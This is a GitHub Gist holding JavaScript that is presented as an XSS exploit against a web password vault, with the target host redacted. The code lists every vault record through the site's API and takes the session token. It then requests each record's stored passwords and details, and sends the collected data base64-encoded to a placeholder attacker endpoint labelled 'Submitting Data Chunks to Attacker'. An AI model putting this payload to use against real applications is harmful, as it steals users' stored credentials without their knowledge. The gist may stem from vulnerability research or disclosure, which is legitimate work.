Created
August 20, 2018 07:26
-
-
Save shawarkhanethicalhacker/e40a7c3956fdd24b9fb63d03d94c3d34 to your computer and use it in GitHub Desktop.
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Exploit Code by Shawar Khan | |
var data_chunks = ''; | |
// Capturing Records from API | |
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
// Holds the records in as String | |
var allrecords = data; | |
// converting response to JSON | |
json_allrecords = JSON.parse(allrecords)['records']; | |
// holds record Ids | |
var record_ids = new Array(); | |
Object.entries(json_allrecords).forEach(function(obj) { | |
record_ids.push((obj['1']['0']['id'])); | |
}); | |
// Capturing Session Token / Used to send POST requests | |
fetch('https://redacted.com/api/v1/session/token').then((resp) => resp.text()).then(function(data1) { | |
// Holds Session Token | |
var session_token = JSON.parse(data1)['session_token']; | |
data_chunks = ""; // Will hold a complete record | |
//Put loop for itterating through IDS | |
record_ids.forEach(function(record_id) { | |
// Looping through IDs and grabing Passwords | |
var grab_password = new XMLHttpRequest(); | |
grab_password.open('POST', 'https://redacted.com/api/v1/passwords/record', true); | |
grab_password.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); | |
grab_password.setRequestHeader("token", session_token); | |
grab_password.onload = function () { | |
response_password = this.responseText; | |
parsed_passwords = JSON.parse(response_password); | |
// Sending data chunks | |
data_chunks += parsed_passwords['record']['description'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['0']['value'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['1']['value'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['2']['value']+"\n\n" | |
}; | |
grab_password.send(JSON.stringify({id:record_id,is_organization:false})); | |
}); | |
setTimeout(function(){ // Submitting Data Chunks to Attacker | |
fetch('http://127.0.0.1/?data='+btoa(data_chunks)) | |
}, 2000); | |
}); | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment